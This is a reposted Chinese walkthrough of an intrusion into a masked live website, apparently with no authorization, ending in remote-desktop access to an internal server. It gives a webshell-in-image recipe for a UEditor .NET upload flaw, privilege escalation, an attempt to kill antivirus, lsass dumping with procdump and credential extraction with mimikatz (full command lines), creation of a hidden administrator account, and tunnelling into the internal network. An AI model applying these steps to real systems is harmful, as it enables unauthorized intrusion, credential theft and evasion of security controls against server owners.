您当前的位置:首页 > 电脑百科 > 安全防护 > 服务器/网站

骚操作实战撸进内网服务器

时间:2020-08-12 15:00:44  来源:  作者:


本次教程较为基础,打码比较严重,有很多不足的地方,希望各位大佬能够指正。

目标站:http://xxx.com 要求:登录远程桌面

通过 超级ping 检测出网站的IP 直接访问ip ...

骚操作实战撸进内网服务器

 

通过FOFA Pro View 这个插件可以快速的扫描出开放的端口 (由于更新,之前的不能用了,修改下地址就可以了)

骚操作实战撸进内网服务器

 

还有WAppalyzer 这个插件也比较好用快速检测出网站的中间件等

骚操作实战撸进内网服务器

 

这里我比较疑惑asp.net 一般都是搭配mssql数据库吧,它上面显示开放3306。。。

我访问一下直接 403

目录扫描扫出了后台

骚操作实战撸进内网服务器

 

尝试下弱口令

骚操作实战撸进内网服务器

 


骚操作实战撸进内网服务器

 

他这里会校验用户名 ,通过检测不会对访问次数进行限制 ,那还等啥!

burp一梭跑 刚好让他尝尝我大字典的厉害

骚操作实战撸进内网服务器

 

最终我还是败了,啥也别说了,上神器xray

出来打工,之前白嫖的高级版还没上手,今天试试水,

贴出xray的官方使用说明 https://docs.xray.cool/#/tutorial/introduce 这款工具还是蛮好用的,

啥也不说,开干(我懒,就使用基础爬虫+扫描网站了)。

骚操作实战撸进内网服务器

 

。。。有点尬 只能手动测试下了, 习惯性的查看一下有没有目录遍历漏洞 (我自己的手法: 找到一张图片->右键复制地址到地址栏->查看相关路径->访问)(注意:图片一般最好选择文章或者资料里面的 别问,问就是直觉)

骚操作实战撸进内网服务器

 

哦啊,没发现目录遍历但是发现了ueditor,联想到之前插件扫到的web框架是 .net的 有篇文章是专门讲解有关Ueditor .net下的漏洞的 https://www.freebuf.com/vuls/181814.html

先访问一下路径显示

骚操作实战撸进内网服务器

 

利用poc上传(自己构造好html上传界面,然后上传自己服务器上的图片马用 ? 进行截断就可以了)

(服务器:白嫖一年彩虹云云主机 图片马: 非常简单,我们只需要一张图片1.jpg 一句话木马写好的aspx文件 1.aspx,之后我们进入到命令行。

注意:将aspx文件和图片文件放到同一目录下,cmd也要跳转到放文件的目录下之后执行命令 copy 1.jpg/b + 1.aspx/a 2.jpg 新生成的2.jpg就是我们制作好的图片马了。)

将POC中的url更换成我们的目标站,上传格式 http://myweb.com/1.jpg?.aspx

骚操作实战撸进内网服务器

 


骚操作实战撸进内网服务器

 

上传成功 直接返回一句话地址

骚操作实战撸进内网服务器

 

成功解析,上菜刀

骚操作实战撸进内网服务器

 

成功getshell ,查看下权限

骚操作实战撸进内网服务器

 

这权限属实有点小,不过还能执行命令 ipconfig 发现是 内网。。。怪不得

骚操作实战撸进内网服务器

 

Systeminfo

骚操作实战撸进内网服务器

 


骚操作实战撸进内网服务器

 

2012 修补了8个补丁 先祭出神站https://bugs.hacking8.com/tiquan/ 在线 exp对比,非常值得推荐

这里看到2012 啥也别说烂土豆一梭跑

发现上传不上。。。

骚操作实战撸进内网服务器

 

刚开始我以为是权限的问题后来发现每个文件夹我都不能上传。。。

搞得我一脸懵* 是不是因为菜刀的问题 那就直接先写入一个aspx的查询可读可写目录的马子

骚操作实战撸进内网服务器

 

成功写入并查询成功 然后新建一个大马

骚操作实战撸进内网服务器

 

不是吧,这么难的吗? 还好我有预编译出错的shell

骚操作实战撸进内网服务器

 

成功 然后配合我的可读可写的马子 成功上传烂土豆

骚操作实战撸进内网服务器

 

提权成功 get到system 权限 接下来就是找3389了 netstat -ano

骚操作实战撸进内网服务器

 

看到一个 33890 越看越像3389 tasklist -svc : 查看系统进程 找到对应的pid

骚操作实战撸进内网服务器

 


骚操作实战撸进内网服务器

 

不得不吐槽一下这个管理员 真的有点2...3389端口到手,内网IP到手,system权限到手,接下来直接添加账号登录了

Net user abc abc /add 添加账号net localgroup administrators abc /add 将用户添加到管理员组

执行命令发现无回显,刚开始以为对账号密码的长度有限制,但是测试了很多次发现不是这个问题,明明是system权限为什么不能添加用户呢?

在白天打工的时候用手机找到很多类似对应的情况:有杀软、对账号密码有限制、防火墙等等 并且从网上找到了很多绕过的姿势 晚上回到家二话不说就开干,tasklist -svc

骚操作实战撸进内网服务器

 

经过我一个一个的百度,终于发现了问题所在 原来存在火绒。。。(对杀毒软件进程不是很了解)

其实这里我想说明一下,很多人习惯性的遇到一点很问题就问别人,其实完全可以自己先百度一下,这样不仅可以加深对问题的记忆,将来在遇到同类型问题的时候也可以快速的找到解决的思路

利用白天找到的思路,可以先kill掉火狐的进程这里我就直接贴出方法 https://jingyan.baidu.com/article/656db9183f65c0e381249c83.html

但是事情往往是那么的不尽人意

骚操作实战撸进内网服务器

 

。。。 n m 玩鸡毛 再试试另一种方法,直接mimimakatz读取administrator的密码

但是这里是server2012 尝试使用procdump来导出目标主机的lsass.dmp 到本机用mimikatz读取密码

1.导出lsass.exeprocdump64.exe -accepteula -ma lsass.exe lsass.dmp

2.执行mimikatzmimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

(前提需要管理员权限)

读出了hash没读出明文密码

骚操作实战撸进内网服务器

 

Sha1解密不出来 还尝试了很多姿势,都没有成功,只能求助大佬了

骚操作实战撸进内网服务器

 

啥话不说直接开干

+

骚操作实战撸进内网服务器

 

成功绕过并添加到了管理员组,由于是内网我们直接上 Proxifier+reGeorg(之前遇到过一次内网的环境就是用的这个组合)相关使用方法可以参考:https://www.freebuf.com/column/206524.html 进行了解

然后 就。。。

骚操作实战撸进内网服务器

 

任务完成 打扫战场 收工

总结:

安装相关浏览器插件会很方便的进行信息收集遇到问题不要一股脑的问别人,

先想办法自己解决多收集一些好用的工具、网站等,

用的时候直接就能甩过来多总结自己的经验和收获,这样你才能在实战中快速上手

转载自:https://xz.aliyun.com/t/8083



Tags:内网服务器   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
centos 7下安装frp+openxxx实现内网服务器。 frp 内网穿透工具 openxxx 虚拟网络工具准备 云服务器、内网主机 云服务器,外网访问地址39.33.12.12,用来做frp服务端 内网服务器...【详细内容】
2021-03-16  Tags: 内网服务器  点击:(193)  评论:(0)  加入收藏
本次教程较为基础,打码比较严重,有很多不足的地方,希望各位大佬能够指正。目标站:http://xxx.com 要求:登录远程桌面通过 超级ping 检测出网站的IP 直接访问ip ... 通过FOFA P...【详细内容】
2020-08-12  Tags: 内网服务器  点击:(82)  评论:(0)  加入收藏
对于企业网络,经常会用到访问控制,例如限制员工的上网时间?或如何控制各部门之间的网络互通等等,在实际企业网络项目中经常会遇到,这里面我们就可以用到ACL访问列表控制了,本期我...【详细内容】
2020-06-05  Tags: 内网服务器  点击:(769)  评论:(0)  加入收藏
1 配置需求或说明1.1 适用的产品系列本案例适用于软件平台为Comware V7系列防火墙:F100-X-G2、F1000-X-G2、F100-WiNet、F1000-AK、F10X0等注:本案例是在F100-C-G2的Version 7...【详细内容】
2020-03-08  Tags: 内网服务器  点击:(919)  评论:(0)  加入收藏
很多时候,部署在内网的服务器,需要同时为内外网用户提供服务,通常情况下,我们都用域名来访问这台服务器,这种方式有很明显的优势,就是允许IP地址变化,当服务器IP必须变更的时候,只要...【详细内容】
2019-09-11  Tags: 内网服务器  点击:(374)  评论:(0)  加入收藏
VPN是一个经常会运用到的功能,即“虚拟专用网络”,可以把它理解成虚拟的企业内部专线。它可以通过特殊的加密的通讯协议在连接在Internet上的位于不同地方的两个或多个企业内...【详细内容】
2019-06-11  Tags: 内网服务器  点击:(26315)  评论:(0)  加入收藏
▌简易百科推荐
在最近的一波攻击中,黑客利用多个插件中未修补的漏洞攻击了 160 万个 WordPress 网站。 易受攻击的插件对 WordPress 网站产生了的巨大攻击数据。 Wordfence 最近发现 WordPr...【详细内容】
2021-12-16  蚁安    Tags:WordPress   点击:(8)  评论:(0)  加入收藏
事件起因从安全分析系统里面发现一条带有病毒的下载,然后针对这条记录展开了一系列的分析分析过程1.登录到被感染服务器,查看系统状况,hadoop 这个用户在 2020/6/18 20:32 从这...【详细内容】
2021-11-23  Z2990Lig    Tags:SSH   点击:(32)  评论:(0)  加入收藏
1、除了服务器需要用的一些正规软件,其它都不要安装。2、在用户中把administrator改名,这样做的目的是即使对方暴破了我们的密码用户名也不容易猜住,相当于又加了一道关卡。...【详细内容】
2021-11-01  IT小哥吧    Tags:服务器   点击:(37)  评论:(0)  加入收藏
账户安全(1)更名administrator本地用户并禁用guest账户步骤:点击“开始”,找到“管理工具”,点击里面的“计算机管理”,找到“本地用户和组” (2)设定账户锁定策略尝试5次失败...【详细内容】
2021-10-12  Kali与编程  今日头条  Tags:Windows主机   点击:(62)  评论:(0)  加入收藏
本文主要介绍以Microsoft的Windows Server 2019 ,版本:Datacenter(Domain Controller)安全加固保护.企业随着规模不断扩大,业务增多,信息安全建设是企业里一条只有重点没有终点...【详细内容】
2021-09-17  Vireshark    Tags:服务器安全   点击:(64)  评论:(0)  加入收藏
目录常见共享命令IPC$IPC$的利用条件1:开启了139、445端口2:目标主机开启了IPC$共享3:IPC连接报错IPC空连接空连接可以做什么?(毫无作用)IPC$非空连接IPC$非空连接可以做什么?di...【详细内容】
2021-09-16  网络说安全    Tags:系统安全   点击:(86)  评论:(0)  加入收藏
昨天一个老哥找到我,说他的服务器这几天一直被CC攻击,问我这边有没有什么解决的方法? 近年来,网络攻击事件越来越频繁,最常见的就是CC攻击和DDOS攻击,主要的区别就是针对的对象不...【详细内容】
2021-09-10  小蚁GDRAGON    Tags:cc攻击   点击:(58)  评论:(0)  加入收藏
网站页面上的登录操作,通常都是输入帐号密码,传输至网站后台验证。在网站页面、数据传输中,通过技术手段,都可以得到用户输入的信息,并可以修改,从而发起网络攻击。典型的如:使用自...【详细内容】
2021-08-30  修丹道的程序猿    Tags:登录方式   点击:(62)  评论:(0)  加入收藏
网络安全研究人员披露了一类影响主要 DNS 即服务 (DNSaaS) 提供商的新漏洞,这些漏洞可能允许攻击者从企业网络中窃取敏感信息。基础设施安全公司 Wiz 的研究人员 Shir Tamar...【详细内容】
2021-08-12  零日时代    Tags:漏洞   点击:(66)  评论:(0)  加入收藏
001暴力破解1. 指定用户名爆破密码传统型爆破思路,用户名可以通过猜测或者信息收集获得。猜测:admin、网站域名等信息收集:新闻发布人、whoami等2. 指定密码爆破用户名如果是后...【详细内容】
2021-07-23  KaliMa  今日头条  Tags:登陆框   点击:(85)  评论:(0)  加入收藏
最新更新
栏目热门
栏目头条